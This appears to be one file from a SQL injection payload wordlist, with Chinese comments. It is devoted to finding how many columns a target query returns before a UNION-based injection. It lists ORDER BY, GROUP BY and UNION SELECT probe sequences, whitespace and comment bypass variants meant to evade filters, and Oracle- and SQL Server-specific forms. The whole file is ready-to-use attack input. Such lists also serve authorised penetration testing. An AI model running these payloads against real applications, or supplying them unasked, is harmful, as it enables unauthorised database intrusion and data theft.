# ============================================================
# SQL Injection Payload Dictionary — 02 列数探测类
# 用途: 探测目标查询返回的列数（为 UNION 注入做准备）
# 适用: 所有数据库
# 方法1: ORDER BY（通用，几乎不会报语法错误）
# 方法2: GROUP BY（备选）
# 方法3: UNION SELECT（直接试错）
# ============================================================

# ---- ORDER BY 法（推荐）----
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
ORDER BY 5
ORDER BY 6
ORDER BY 7
ORDER BY 8
ORDER BY 9
ORDER BY 10
ORDER BY 11
ORDER BY 12
ORDER BY 13
ORDER BY 14
ORDER BY 15
ORDER BY 16
ORDER BY 17
ORDER BY 18
ORDER BY 19
ORDER BY 20
ORDER BY 100
ORDER BY 1000

# ---- ORDER BY 无空格绕过 ----
ORDER%0aBY 1
ORDER%09BY 1
ORDER/**/BY 1

# ---- GROUP BY 备选 ----
GROUP BY 1
GROUP BY 2
GROUP BY 3
GROUP BY 4
GROUP BY 5
GROUP BY 6
GROUP BY 7
GROUP BY 8
GROUP BY 9
GROUP BY 10

# ---- UNION SELECT 直接试（列数不对齐时数据库报错） ----
UNION SELECT 1
UNION SELECT 1,2
UNION SELECT 1,2,3
UNION SELECT 1,2,3,4
UNION SELECT 1,2,3,4,5
UNION SELECT 1,2,3,4,5,6
UNION SELECT 1,2,3,4,5,6,7
UNION SELECT 1,2,3,4,5,6,7,8
UNION SELECT 1,2,3,4,5,6,7,8,9
UNION SELECT 1,2,3,4,5,6,7,8,9,10

# ---- UNION SELECT NULL（某些数据库 NULL 类型更兼容） ----
UNION SELECT NULL
UNION SELECT NULL,NULL
UNION SELECT NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL

# ---- UNION ALL（不去重，有时可绕过过滤 ----
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4,5

# ---- Oracle 专用（必须带 FROM dual） ----
UNION SELECT 1,2 FROM dual--
UNION SELECT 1,2,3 FROM dual--
UNION SELECT NULL,NULL FROM dual--
UNION SELECT NULL,NULL,NULL FROM dual--

# ---- SQL Server 专用（可尝试 TOP） ----
SELECT TOP 1 1,2,3
SELECT TOP 1 NULL,NULL,NULL
